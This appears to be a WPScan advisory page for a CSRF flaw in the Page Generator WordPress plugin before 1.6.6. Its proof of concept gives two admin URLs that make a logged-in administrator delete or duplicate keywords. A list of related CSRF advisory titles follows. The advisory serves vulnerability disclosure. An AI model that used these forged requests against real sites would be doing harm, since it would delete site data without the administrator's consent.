Page Generator Plugin < 1.6.6 – Arbitrary Keywords Deletion/Duplication via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting and duplicating keywords, which could allow attackers to make a logged in admin delete and duplicate arbitrary keywords via CSRF attacks

Proof of Concept

https://example.com/wp-admin/admin.php?page=page-generator-keywords&cmd=delete&id=3

https://example.com/wp-admin/admin.php?page=page-generator-keywords&action=delete&ids%5B4%5D=4&action2=delete

Affects Plugins

Fixed in 1.6.6

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

8c585797-3756-4bed-aa7a-de20d246a3d1

Timeline

Publicly Published

2022-06-27 (about 3 years ago)

Added

2022-06-27 (about 3 years ago)

Last Updated

2022-06-27 (about 3 years ago)

Other

Published

Title

Published

2025-03-27

Title

Serial Codes Generator and Validator with WooCommerce Support < 2.7.8 - Cross-Site Request Forgery via [placeholder]

Published

2025-10-02

Title

WP SinoType <= 1.0 - Cross-Site Request Forgery

Published

2018-05-15

Title

Metronet Tag Manager < 1.2.9 - Cross-Site Request Forgery (CSRF)

Published

2025-10-02

Title

Customify < 0.4.12 - Cross-Site Request Forgery

Published

2024-05-09

Title

Arigato Autoresponder and Newsletter < 2.7.2.4 - Cross-Site Request Forgery